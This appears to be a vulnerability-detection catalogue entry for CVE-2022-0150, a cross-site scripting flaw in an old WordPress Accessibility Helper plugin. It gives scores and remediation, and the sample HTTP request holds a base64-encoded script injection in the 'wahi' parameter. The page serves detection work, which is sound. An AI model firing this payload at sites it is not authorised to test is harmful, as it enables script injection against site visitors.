🔙 목록으로 돌아가기

CVE-2022-0150: WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting

TitleWordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting
AuthordhiyaneshDK
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access, data theft, or defacement of the affected WordPress website.
RemediationUpdate to WordPress Accessibility Helper version 0.6.0.7 or later to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.01307
CVE IDCVE-2022-0150
CWE IDCWE-79
Tags cve cve2022 wordpress wp-plugin wp wpscan xss wp_accessibility_helper_project vuln

🔍 Vulnerability Description

WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.

🌐 HTTP Request

GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0150.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0150.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A